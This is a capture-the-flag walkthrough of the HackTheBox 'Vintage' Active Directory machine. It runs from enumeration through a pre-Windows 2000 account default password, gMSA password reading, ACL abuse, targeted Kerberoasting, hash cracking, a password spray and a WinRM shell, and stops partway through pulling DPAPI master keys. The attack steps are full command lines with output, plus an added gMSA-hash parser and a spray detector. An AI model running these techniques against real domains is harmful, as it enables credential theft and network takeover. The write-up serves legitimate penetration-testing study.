HTB | Vintage

Machine - https://app.hackthebox.com/machines/Vintage

IP - 10.10.11.45

Machine Information - As is common in real life Windows pentests, you will start the Vintage box with credentials for the following account: P.Rosa / Rosaisbest123

NMAP

└─$ nmap -sT -p- --min-rate 10000 10.10.11.45 -Pn -oA nmap_ports                                                                                                              
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-07-25 19:08 IST
Nmap scan report for 10.10.11.45
Host is up (0.85s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49664/tcp open  unknown
49668/tcp open  unknown
49674/tcp open  unknown
49685/tcp open  unknown
56155/tcp open  unknown
56230/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 273.80 seconds
└─$ nmap -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49668,49674,49685,56155,56230 10.10.11.45 -Pn -oA nmap_port_details
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-07-25 19:16 IST
Nmap scan report for 10.10.11.45
Host is up (0.60s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-25 13:46:52Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49685/tcp open  msrpc         Microsoft Windows RPC
56155/tcp open  msrpc         Microsoft Windows RPC
56230/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: -2s
| smb2-time: 
|   date: 2025-07-25T13:47:50
|_  start_date: N/A

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 133.47 seconds

SMB

└─$ netexec smb 10.10.11.45 -u 'P.Rosa' -p 'Rosaisbest123'
SMB         10.10.11.45     445    10.10.11.45      [*]  x64 (name:10.10.11.45) (domain:10.10.11.45) (signing:True) (SMBv1:False) (NTLM:False)
SMB         10.10.11.45     445    10.10.11.45      [-] 10.10.11.45\P.Rosa:Rosaisbest123 STATUS_NOT_SUPPORTED

(NTLM:False) shows that NTLM authentication is disabled, which is why the password logon above fails with STATUS_NOT_SUPPORTED. I'll use Kerberos instead, with a krb5.conf that points at dc01.vintage.htb as the KDC, and it works:

└─$ impacket-getTGT vintage.htb/'P.Rosa':'Rosaisbest123'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in P.Rosa.ccache

┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ cat krb5.conf  
[libdefaults]
    dns_lookup_kdc = false
    dns_lookup_realm = false
    default_realm = VINTAGE.HTB

[realms]
    VINTAGE.HTB = {
        kdc = dc01.vintage.htb
        admin_server = dc01.vintage.htb
        default_domain = vintage.htb
    }

[domain_realm]
    .vintage.htb = VINTAGE.HTB
    vintage.htb = VINTAGE.HTB
                                                                                                                                                                                                                                                                             
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ export KRB5_CONFIG=./krb5.conf

┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ export KRB5CCNAME=P.Rosa.ccache

┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ netexec smb dc01.vintage.htb -u 'P.Rosa' -p 'Rosaisbest123' -k
SMB         dc01.vintage.htb 445    dc01             [*]  x64 (name:dc01) (domain:vintage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc01.vintage.htb 445    dc01             [+] vintage.htb\P.Rosa:Rosaisbest123

Enumerate shares

└─$ netexec smb dc01.vintage.htb -u 'P.Rosa' -p 'Rosaisbest123' -k --shares
SMB         dc01.vintage.htb 445    dc01             [*]  x64 (name:dc01) (domain:vintage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc01.vintage.htb 445    dc01             [+] vintage.htb\P.Rosa:Rosaisbest123
SMB         dc01.vintage.htb 445    dc01             [*] Enumerated shares
SMB         dc01.vintage.htb 445    dc01             Share           Permissions     Remark
SMB         dc01.vintage.htb 445    dc01             -----           -----------     ------
SMB         dc01.vintage.htb 445    dc01             ADMIN$                          Remote Admin
SMB         dc01.vintage.htb 445    dc01             C$                              Default share
SMB         dc01.vintage.htb 445    dc01             IPC$            READ            Remote IPC
SMB         dc01.vintage.htb 445    dc01             NETLOGON        READ            Logon server share 
SMB         dc01.vintage.htb 445    dc01             SYSVOL          READ            Logon server share 

We can also pull the domain user list over SMB:

└─$ netexec smb dc01.vintage.htb -u 'P.Rosa' -p 'Rosaisbest123' -k --users
SMB         dc01.vintage.htb 445    dc01             [*]  x64 (name:dc01) (domain:vintage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc01.vintage.htb 445    dc01             [+] vintage.htb\P.Rosa:Rosaisbest123
SMB         dc01.vintage.htb 445    dc01             -Username-                    -Last PW Set-       -BadPW- -Description-                                               
SMB         dc01.vintage.htb 445    dc01             Administrator                 2024-06-08 11:34:54 0       Built-in account for administering the computer/domain 
SMB         dc01.vintage.htb 445    dc01             Guest                         2024-11-13 14:16:53 0       Built-in account for guest access to the computer/domain 
SMB         dc01.vintage.htb 445    dc01             krbtgt                        2024-06-05 10:27:35 0       Key Distribution Center Service Account 
SMB         dc01.vintage.htb 445    dc01             M.Rossi                       2024-06-05 13:31:08 0        
SMB         dc01.vintage.htb 445    dc01             R.Verdi                       2024-06-05 13:31:08 0        
SMB         dc01.vintage.htb 445    dc01             L.Bianchi                     2024-06-05 13:31:08 0        
SMB         dc01.vintage.htb 445    dc01             G.Viola                       2024-06-05 13:31:08 0        
SMB         dc01.vintage.htb 445    dc01             C.Neri                        2024-06-05 21:08:13 0        
SMB         dc01.vintage.htb 445    dc01             P.Rosa                        2024-11-06 12:27:16 0        
SMB         dc01.vintage.htb 445    dc01             svc_sql                       2025-07-25 14:52:08 0        
SMB         dc01.vintage.htb 445    dc01             svc_ldap                      2024-06-06 13:45:27 0        
SMB         dc01.vintage.htb 445    dc01             svc_ark                       2024-06-06 13:45:27 0        
SMB         dc01.vintage.htb 445    dc01             C.Neri_adm                    2024-06-07 10:54:14 0        
SMB         dc01.vintage.htb 445    dc01             L.Bianchi_adm                 2024-11-26 11:40:30 0        
SMB         dc01.vintage.htb 445    dc01             [*] Enumerated 14 local users: VINTAGE

Bloodhound

└─$ bloodhound-python -u 'P.Rosa' -p 'Rosaisbest123' -d vintage.htb -ns 10.10.11.45 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: vintage.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.vintage.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc01.vintage.htb
INFO: Found 16 users
INFO: Found 58 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: FS01.vintage.htb
INFO: Querying computer: dc01.vintage.htb
WARNING: Could not resolve: FS01.vintage.htb: The DNS query name does not exist: FS01.vintage.htb.
INFO: Done in 01M 28S
INFO: Compressing output into 20250725203416_bloodhound.zip

Interestingly, there are two computers, DC01 and FS01, and FS01 does not resolve in DNS.

Foothold / Shell

Shell as C.Neri

Weak Permission: Pre-Windows 2000 Compatible Access

Looking at FS01$ in BloodHound: FS01.VINTAGE.HTB -> MemberOf -> PRE-WINDOWS 2000 COMPATIBLE ACCESS@VINTAGE.HTB

When a new computer account is created as a "pre-Windows 2000 computer", its password is derived from its name (the lowercase computer name without the trailing $). Otherwise the password is randomly generated.

Let's try to authenticate as FS01$ with fs01 as the password:

└─$ netexec ldap vintage.htb -u 'FS01$' -p 'fs01' -k
LDAP        vintage.htb     389    DC01             [*] None (name:DC01) (domain:vintage.htb)
LDAP        vintage.htb     389    DC01             [+] vintage.htb\FS01$:fs01

Bingo! It worked.

Auth as GMSA01$

FS01.VINTAGE.HTB -> MemberOf -> DOMAIN COMPUTERS@VINTAGE.HTB -> ReadGMSAPassword -> GMSA01$@VINTAGE.HTB

Let's read the msDS-ManagedPassword attribute of GMSA01$ with bloodyAD; it returns both the raw password blob and its NT hash:

└─$ kinit 'FS01$@VINTAGE.HTB'
Password for FS01$@VINTAGE.HTB: 

└─$ bloodyAD --host dc01.vintage.htb -d vintage.htb -u 'FS01$' -p 'fs01' -k get object --resolve-sd 'GMSA01$' --attr msDS-ManagedPassword 

distinguishedName: CN=gMSA01,CN=Managed Service Accounts,DC=vintage,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:5008d30496b4c5069ce1fc187b5b5960
msDS-ManagedPassword.B64ENCODED: bf1cBrHgnrALWx1WFDnvyHlBZcnkH+3VWYL4yBPdXcXgE7ENWHpWc03uhzxvXLrT5eh71spfFnajFbFuYuHCk2bczzZnBOeruwpF5vpYWmmULhBQoBvyxVWvr2MwOcHOyS7LQYMZdAlJ8k0Dg/2J3ie5SJFNM+Sb7M+Nx+zLSG3A7lYcdYcLS5ed0D8jw1TFB4g4+S0pqNRMjXp2b3HpJbHBFnn6wTDKrDiOZaG/DJHDODoCG0oAncE43Rtpf5lve49jd+m8QGqbQXmQEqCTH/CPS5/n6TKQgqzIMyE8LaxMK3s4UXJAbh8wlskq7j27jD61W7V0JMeMT/dvQu20Jg==

Let's try to authenticate as GMSA01$ with the NT hash:

└─$ netexec smb dc01.vintage.htb -u 'gmsa01$' -H '5008d30496b4c5069ce1fc187b5b5960' -k
SMB         dc01.vintage.htb 445    dc01             [*]  x64 (name:dc01) (domain:vintage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc01.vintage.htb 445    dc01             [+] vintage.htb\gmsa01$:5008d30496b4c5069ce1fc187b5b5960
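As an added illustration (not code from this writeup or from bloodyAD), here is how a principal with ReadGMSAPassword turns the msDS-ManagedPassword attribute into the NT hash that netexec accepted above: the attribute is an MSDS-MANAGEDPASSWORD_BLOB whose CurrentPassword is a null-terminated UTF-16LE string, and the NT hash is MD4 over those bytes. The sample password and the blob built from it are constructed; a real gMSA password is 256 random bytes, but the parsing and hashing are identical.

```python
import struct

# Constructed sample password for the demo. Real gMSA passwords are 256 bytes of
# random UTF-16LE data; the structure and the hashing below are the same.
SAMPLE_PASSWORD = "password"
TICKS_PER_DAY = 10_000_000 * 86_400  # the interval fields are 100 ns ticks


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320). An NT hash is MD4 over the UTF-16LE password."""
    mask = 0xFFFFFFFF
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    r3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for i in range(16):  # round 1
            a, b, c, d = d, rotl((a + f(b, c, d) + x[i]) & mask, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, rotl((a + g(b, c, d) + x[k] + 0x5A827999) & mask, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3
            a, b, c, d = d, rotl((a + h(b, c, d) + x[r3[i]] + 0x6ED9EBA1) & mask, (3, 9, 11, 15)[i % 4]), b, c
        state = [(s + v) & mask for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password_utf16le: bytes) -> str:
    """NT hash (hex) of an already UTF-16LE-encoded password, terminator excluded."""
    return md4(password_utf16le).hex()


def build_managed_password_blob(current: str, query_days: int = 30, unchanged_days: int = 30) -> bytes:
    """Constructed MSDS-MANAGEDPASSWORD_BLOB (version 1) with no PreviousPassword."""
    cur = current.encode("utf-16-le") + b"\x00\x00"  # null-terminated WCHAR string
    body = cur + b"\x00" * (-len(cur) % 8)            # AlignmentPadding to 8 bytes
    header_len = 16
    qpi_off = header_len + len(body)                  # QueryPasswordInterval
    upi_off = qpi_off + 8                             # UnchangedPasswordInterval
    body += struct.pack("<QQ", query_days * TICKS_PER_DAY, unchanged_days * TICKS_PER_DAY)
    total = header_len + len(body)
    # Version, Reserved, Length, CurrentPasswordOffset, PreviousPasswordOffset (0 = absent),
    # QueryPasswordIntervalOffset, UnchangedPasswordIntervalOffset
    header = struct.pack("<HHIHHHH", 1, 0, total, header_len, 0, qpi_off, upi_off)
    return header + body


def _read_wstr(blob: bytes, off: int) -> bytes:
    """Raw bytes of the null-terminated UTF-16LE string at off (terminator excluded)."""
    for i in range(off, len(blob) - 1, 2):
        if blob[i:i + 2] == b"\x00\x00":
            return blob[off:i]
    raise ValueError("unterminated WCHAR string")


def parse_managed_password_blob(blob: bytes) -> dict:
    """Parse msDS-ManagedPassword and derive the NT hash a tool like bloodyAD reports."""
    version, _reserved, length, cur_off, prev_off, qpi_off, upi_off = struct.unpack_from("<HHIHHHH", blob, 0)
    if version != 1 or length != len(blob):
        raise ValueError("not a version-1 MSDS-MANAGEDPASSWORD_BLOB")
    cur = _read_wstr(blob, cur_off)
    prev = _read_wstr(blob, prev_off) if prev_off else None
    qpi, = struct.unpack_from("<Q", blob, qpi_off)
    upi, = struct.unpack_from("<Q", blob, upi_off)
    return {
        "current_password": cur,
        "nt_hash": nt_hash(cur),
        "previous_password": prev,
        "query_interval_days": qpi / TICKS_PER_DAY,
        "unchanged_interval_days": upi / TICKS_PER_DAY,
    }


if __name__ == "__main__":
    info = parse_managed_password_blob(build_managed_password_blob(SAMPLE_PASSWORD))
    print("NT hash:", info["nt_hash"], "rotates every", info["query_interval_days"], "days")
```

Because the hash is derived directly from the attribute, anyone who can read msDS-ManagedPassword holds a credential that is valid until the next rotation, which is why ReadGMSAPassword is audited like a password read.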

GenericWrite / AddSelf

GMSA01$@VINTAGE.HTB -> GenericWrite/ AddSelf -> SERVICEMANAGERS@VINTAGE.HTB

Let's add GMSA01$@VINTAGE.HTB to the SERVICEMANAGERS group:

└─$ impacket-getTGT vintage.htb/'gmsa01$' -hashes :5008d30496b4c5069ce1fc187b5b5960 -dc-ip 10.10.11.45
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in gmsa01$.ccache

└─$ export KRB5CCNAME=gmsa01\$.ccache

┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ klist
Ticket cache: FILE:gmsa01$.ccache
Default principal: gmsa01$@VINTAGE.HTB

Valid starting     Expires            Service principal
07/25/25 21:17:53  07/26/25 07:17:53  krbtgt/VINTAGE.HTB@VINTAGE.HTB
        renew until 07/26/25 21:17:53

┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ bloodyAD --host dc01.vintage.htb -d vintage.htb -k add groupMember SERVICEMANAGERS 'gmsa01$'
[+] gmsa01$ added to SERVICEMANAGERS

GenericAll

SERVICEMANAGERS@VINTAGE.HTB -> GenericAll -> SVC_ARK@VINTAGE.HTB / SVC_LDAP@VINTAGE.HTB / SVC_SQL@VINTAGE.HTB

Targeted Kerberoasting on SVC_SQL

We can try targeted Kerberoasting on the SVC_* accounts, but first we need to enable SVC_SQL@VINTAGE.HTB, which is disabled.

Remember to request a new TGT for GMSA01$ first: group membership is written into the ticket when it is issued, so the old ticket does not carry the new SERVICEMANAGERS membership.

└─$ bloodyAD --host dc01.vintage.htb -d vintage.htb  -k remove uac svc_sql -f ACCOUNTDISABLE          
[-] ['ACCOUNTDISABLE'] property flags removed from svc_sql's userAccountControl

For targeted Kerberoasting I need to set an SPN on each account:

└─$ bloodyAD -d vintage.htb -k --host dc01.vintage.htb -u 'GMSA01$' -p 5008d30496b4c5069ce1fc187b5b5960 -f rc4 set object svc_ldap servicePrincipalName -v 'http/whateverldap'
[+] svc_ldap's servicePrincipalName has been updated

┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ bloodyAD -d vintage.htb -k --host dc01.vintage.htb -u 'GMSA01$' -p 5008d30496b4c5069ce1fc187b5b5960 -f rc4 set object svc_ark servicePrincipalName -v 'http/whateverark'
[+] svc_ark's servicePrincipalName has been updated

┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ bloodyAD -d vintage.htb -k --host dc01.vintage.htb -u 'GMSA01$' -p 5008d30496b4c5069ce1fc187b5b5960 -f rc4 set object svc_sql servicePrincipalName -v 'http/whateversql'
[+] svc_sql's servicePrincipalName has been updated

Now let's perform targeted Kerberoasting with netexec:

└─$ netexec ldap dc01.vintage.htb -u 'gmsa01$' -H '5008d30496b4c5069ce1fc187b5b5960' -k --kerberoasting kerberoast.txt
LDAP        dc01.vintage.htb 389    DC01             [*] None (name:DC01) (domain:vintage.htb)
LDAP        dc01.vintage.htb 389    DC01             [+] vintage.htb\gmsa01$:5008d30496b4c5069ce1fc187b5b5960
LDAP        dc01.vintage.htb 389    DC01             [*] Skipping disabled account: krbtgt
LDAP        dc01.vintage.htb 389    DC01             [*] Total of records returned 3
LDAP        dc01.vintage.htb 389    DC01             [*] sAMAccountName: svc_ark, memberOf: CN=ServiceAccounts,OU=Pre-Migration,DC=vintage,DC=htb, pwdLastSet: 2024-06-06 19:15:27.913095, lastLogon: <never>
LDAP        dc01.vintage.htb 389    DC01             $krb5tgs$23$*svc_ark$VINTAGE.HTB$vintage.htb\svc_ark*$54f5294d4c8ae1547c011a83cb69c460$<--SNIP-->
LDAP        dc01.vintage.htb 389    DC01             [*] sAMAccountName: svc_ldap, memberOf: CN=ServiceAccounts,OU=Pre-Migration,DC=vintage,DC=htb, pwdLastSet: 2024-06-06 19:15:27.881830, lastLogon: <never>
LDAP        dc01.vintage.htb 389    DC01             $krb5tgs$23$*svc_ldap$VINTAGE.HTB$vintage.htb\svc_ldap*$e2b1d9ae89f51f33ff6d6d77df159c46$<--SNIP-->
LDAP        dc01.vintage.htb 389    DC01             [*] sAMAccountName: svc_sql, memberOf: CN=ServiceAccounts,OU=Pre-Migration,DC=vintage,DC=htb, pwdLastSet: 2025-07-25 22:02:06.141659, lastLogon: <never>
LDAP        dc01.vintage.htb 389    DC01             $krb5tgs$23$*svc_sql$VINTAGE.HTB$vintage.htb\svc_sql*$1de69c066d2b07799d11b3bf8e6568d2$<--SNIP-->

Crack the Hash

Let's try to crack the hashes with hashcat (the $krb5tgs$23$ format is auto-detected, so no -m is needed):

└─$ hashcat kerberoast.txt /home/anurag/stuff/rockyou.txt 

<--SNIP-->

$krb5tgs$23$*svc_sql$VINTAGE.HTB$vintage.htb\svc_sql*$d7f53301a490c2bed7a1e92e7c3fd184$<--SNIP-->:Zer0the0ne

<--SNIP-->

Found svc_sql's password; verify it over SMB:

└─$ netexec smb dc01.vintage.htb -u svc_sql -p 'Zer0the0ne' -k
SMB         dc01.vintage.htb 445    dc01             [*]  x64 (name:dc01) (domain:vintage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc01.vintage.htb 445    dc01             [+] vintage.htb\svc_sql:Zer0the0ne

Password spray

Let's spray svc_sql's password against the users we enumerated earlier:

└─$ netexec smb dc01.vintage.htb -u users.txt -p Zer0the0ne -k --continue-on-success
SMB         dc01.vintage.htb 445    dc01             [*]  x64 (name:dc01) (domain:vintage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc01.vintage.htb 445    dc01             [-] vintage.htb\L.Bianchi_adm:Zer0the0ne KDC_ERR_PREAUTH_FAILED
SMB         dc01.vintage.htb 445    dc01             [-] vintage.htb\gMSA01$:Zer0the0ne KDC_ERR_PREAUTH_FAILED
SMB         dc01.vintage.htb 445    dc01             [-] vintage.htb\C.Neri_adm:Zer0the0ne KDC_ERR_PREAUTH_FAILED
SMB         dc01.vintage.htb 445    dc01             [-] vintage.htb\svc_ark:Zer0the0ne KDC_ERR_PREAUTH_FAILED
SMB         dc01.vintage.htb 445    dc01             [-] vintage.htb\svc_ldap:Zer0the0ne KDC_ERR_PREAUTH_FAILED
SMB         dc01.vintage.htb 445    dc01             [+] vintage.htb\svc_sql:Zer0the0ne
SMB         dc01.vintage.htb 445    dc01             [-] vintage.htb\P.Rosa:Zer0the0ne KDC_ERR_PREAUTH_FAILED
SMB         dc01.vintage.htb 445    dc01             [-] vintage.htb\krbtgt:Zer0the0ne KDC_ERR_CLIENT_REVOKED
SMB         dc01.vintage.htb 445    dc01             [+] vintage.htb\C.Neri:Zer0the0ne
SMB         dc01.vintage.htb 445    dc01             [-] vintage.htb\G.Viola:Zer0the0ne KDC_ERR_PREAUTH_FAILED
SMB         dc01.vintage.htb 445    dc01             [-] vintage.htb\R.Verdi:Zer0the0ne KDC_ERR_PREAUTH_FAILED
SMB         dc01.vintage.htb 445    dc01             [-] vintage.htb\Administrator:Zer0the0ne KDC_ERR_PREAUTH_FAILED
SMB         dc01.vintage.htb 445    dc01             [-] vintage.htb\L.Bianchi:Zer0the0ne KDC_ERR_PREAUTH_FAILED
SMB         dc01.vintage.htb 445    dc01             [-] vintage.htb\Guest:Zer0the0ne KDC_ERR_CLIENT_REVOKED
SMB         dc01.vintage.htb 445    dc01             [-] vintage.htb\M.Rossi:Zer0the0ne KDC_ERR_PREAUTH_FAILED
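The defender's view of the spray above: because NTLM is disabled, every guess is a Kerberos AS-REQ, so the DC logs event 4771 (pre-authentication failed, failure code 0x18, or 0x12 for a disabled account) for each wrong password and 4768 (TGT issued) for each hit. The detector below is an added example, not part of this writeup; the events and the 10.10.14.5 / 10.10.11.30 addresses are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample modelled on the spray above (not real log data). Each line is a
# flattened view of Security log fields: time, EventID, TargetUserName, Status, IpAddress.
SAMPLE_EVENTS = """\
2025-07-25T16:20:01 4771 L.Bianchi_adm 0x18 10.10.14.5
2025-07-25T16:20:01 4771 gMSA01$ 0x18 10.10.14.5
2025-07-25T16:20:02 4771 C.Neri_adm 0x18 10.10.14.5
2025-07-25T16:20:02 4771 svc_ark 0x18 10.10.14.5
2025-07-25T16:20:03 4771 svc_ldap 0x18 10.10.14.5
2025-07-25T16:20:03 4768 svc_sql 0x0 10.10.14.5
2025-07-25T16:20:04 4771 P.Rosa 0x18 10.10.14.5
2025-07-25T16:20:04 4771 krbtgt 0x12 10.10.14.5
2025-07-25T16:20:05 4768 C.Neri 0x0 10.10.14.5
2025-07-25T16:20:05 4771 G.Viola 0x18 10.10.14.5
2025-07-25T16:25:00 4771 M.Rossi 0x18 10.10.11.30
2025-07-25T16:31:00 4771 M.Rossi 0x18 10.10.11.30
"""

LINE_RE = re.compile(r"^(\S+) (\d+) (\S+) (0x[0-9a-fA-F]+) (\S+)$")
PREAUTH_FAILURES = {0x18, 0x12}  # KDC_ERR_PREAUTH_FAILED, KDC_ERR_CLIENT_REVOKED


def parse_events(text: str) -> list:
    """Turn the flattened lines into event dicts; unparseable lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, eid, user, status, ip = m.groups()
        events.append({"time": datetime.fromisoformat(ts), "event_id": int(eid),
                       "user": user.lower(), "status": int(status, 16), "ip": ip})
    return events


def detect_kerberos_spray(events: list, window: timedelta = timedelta(seconds=60),
                          min_accounts: int = 5) -> list:
    """Flag a source address whose 4771 failures hit >= min_accounts distinct accounts
    inside `window`, and list the accounts that then obtained a TGT from the same source."""
    by_ip = defaultdict(list)
    for e in sorted(events, key=lambda e: e["time"]):
        by_ip[e["ip"]].append(e)
    findings = []
    for ip, evs in by_ip.items():
        failures = [e for e in evs if e["event_id"] == 4771 and e["status"] in PREAUTH_FAILURES]
        best, best_span, start = set(), None, 0
        for end in range(len(failures)):            # sliding window over the failures
            while failures[end]["time"] - failures[start]["time"] > window:
                start += 1
            users = {e["user"] for e in failures[start:end + 1]}
            if len(users) > len(best):
                best, best_span = users, (failures[start]["time"], failures[end]["time"])
        if best_span and len(best) >= min_accounts:
            # A repeated wrong password from one workstation fails on one account; a spray
            # fails on many. A TGT issued from the same source in the same span is a hit.
            hits = sorted({e["user"] for e in evs if e["event_id"] == 4768 and e["status"] == 0
                           and best_span[0] <= e["time"] <= best_span[1] + window})
            findings.append({"ip": ip, "accounts_tried": len(best), "first": best_span[0],
                             "last": best_span[1], "successful_logons": hits})
    return findings


if __name__ == "__main__":
    for f in detect_kerberos_spray(parse_events(SAMPLE_EVENTS)):
        print(f"{f['ip']}: {f['accounts_tried']} accounts between {f['first']} and {f['last']}, "
              f"successful logons: {f['successful_logons']}")
```
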

The password is reused by C.Neri. With a TGT for C.Neri we get a shell over WinRM and read user.txt:

└─$ kinit 'C.Neri@VINTAGE.HTB'
Password for C.Neri@VINTAGE.HTB:

┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ evil-winrm -i dc01.vintage.htb -r vintage.htb

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\C.Neri\Documents> dir C:\Users\C.neri\Desktop\

    Directory: C:\Users\C.neri\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          6/7/2024   1:17 PM           2312 Microsoft Edge.lnk
-ar---         7/25/2025   3:36 PM             34 user.txt

Privilege Escalation

Shell as L.Bianchi_adm

DPAPI

My first thought was to use RunasCs.exe to get an interactive logon as another user, but it fails, even as a PowerShell script, because of AV.

Instead I'll pull the DPAPI material off the box and decrypt the saved credential offline.

I'll need the master key, information about the account (its SID and password), and the encrypted credential. The master keys live in AppData\Roaming\Microsoft\Protect\[sid]:

*Evil-WinRM* PS C:\users\c.neri\appdata\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115> ls -force

    Directory: C:\users\c.neri\appdata\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a-hs-          6/7/2024   1:17 PM            740 4dbf04d8-529b-4b4c-b4ae-8e875e4fe847
-a-hs-          6/7/2024   1:17 PM            740 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b
-a-hs-          6/7/2024   1:17 PM            904 BK-VINTAGE
-a-hs-          6/7/2024   1:17 PM             24 Preferred

There are two files there that could be the master key. Trying to download either with Evil-WinRM fails:

*Evil-WinRM* PS C:\users\c.neri\appdata\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115> download 4dbf04d8-529b-4b4c-b4ae-8e875e4fe847

Info: Downloading C:\users\c.neri\appdata\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115\4dbf04d8-529b-4b4c-b4ae-8e875e4fe847 to 4dbf04d8-529b-4b4c-b4ae-8e875e4fe847

Error: Download failed. Check filenames or paths: uninitialized constant WinRM::FS::FileManager::EstandardError

          rescue EstandardError => err
                 ^^^^^^^^^^^^^^
Did you mean?  StandardError

I’ll just base64-encode them:

*Evil-WinRM* PS C:\users\c.neri\appdata\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115> [Convert]::ToBase64String([IO.File]::ReadAllBytes('C:\users\c.neri\appdata\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115\4dbf04d8-529b-4b4c-b4ae-8e875e4fe847'))
